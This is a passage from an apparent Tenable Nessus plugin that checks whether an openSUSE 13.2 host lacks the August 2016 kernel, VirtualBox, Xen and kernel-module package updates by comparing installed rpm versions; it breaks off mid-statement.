script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-0.8-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-debugsource-0.8-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-default-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-default-debuginfo-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-desktop-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-desktop-debuginfo-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-pae-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-pae-debuginfo-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-xen-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bbswitch-kmp-xen-debuginfo-0.8_k3.16.7_42-3.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-2.639-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-debuginfo-2.639-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-debugsource-2.639-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-default-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-default-debuginfo-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-desktop-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-desktop-debuginfo-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-pae-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-pae-debuginfo-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-xen-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cloop-kmp-xen-debuginfo-2.639_k3.16.7_42-14.20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-debuginfo-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-debugsource-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-devel-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-eppic-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-eppic-debuginfo-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-gcore-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-gcore-debuginfo-7.0.8-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-default-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-default-debuginfo-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-desktop-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-desktop-debuginfo-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-pae-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-pae-debuginfo-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-xen-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"crash-kmp-xen-debuginfo-7.0.8_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-debugsource-1.28-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-default-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-default-debuginfo-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-desktop-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-desktop-debuginfo-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-pae-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-pae-debuginfo-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-xen-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"hdjmod-kmp-xen-debuginfo-1.28_k3.16.7_42-18.21.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-debuginfo-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-debugsource-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-devel-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-default-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-default-debuginfo-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-desktop-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-desktop-debuginfo-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-pae-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-pae-debuginfo-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-xen-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ipset-kmp-xen-debuginfo-6.23_k3.16.7_42-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-default-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-ec2-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-ec2-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-ec2-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-macros-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-obs-build-3.16.7-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-obs-build-debugsource-3.16.7-42.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-obs-qa-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-obs-qa-xen-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-source-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-source-vanilla-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"kernel-syms-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libipset3-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libipset3-debuginfo-6.23-20.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-0.44-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-debuginfo-0.44-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-debugsource-0.44-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-default-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-default-debuginfo-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-desktop-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-desktop-debuginfo-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-pae-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"pcfclock-kmp-pae-debuginfo-0.44_k3.16.7_42-260.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"python-virtualbox-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"python-virtualbox-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-debugsource-20140629-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-default-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-default-debuginfo-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-desktop-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-desktop-debuginfo-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-pae-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-pae-debuginfo-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-xen-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"vhba-kmp-xen-debuginfo-20140629_k3.16.7_42-2.20.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-debugsource-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-devel-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-desktop-icons-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-default-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-desktop-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-desktop-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-pae-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-kmp-pae-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-tools-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-tools-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-x11-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-guest-x11-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-default-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-default-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-desktop-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-desktop-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-pae-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-kmp-pae-debuginfo-5.0.20_k3.16.7_42-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-host-source-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-qt-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-qt-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-websrv-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"virtualbox-websrv-debuginfo-5.0.20-48.5\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-debugsource-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-devel-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-libs-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-libs-debuginfo-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-tools-domU-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xen-tools-domU-debuginfo-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-2.6-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-debuginfo-2.6-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-debugsource-2.6-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-default-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-default-debuginfo-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-desktop-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-desktop-debuginfo-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-pae-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-pae-debuginfo-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-xen-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"xtables-addons-kmp-xen-debuginfo-2.6_k3.16.7_42-22.3\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-pae-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-vanilla-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"i686\", reference:\"kernel-xen-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-xen-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", 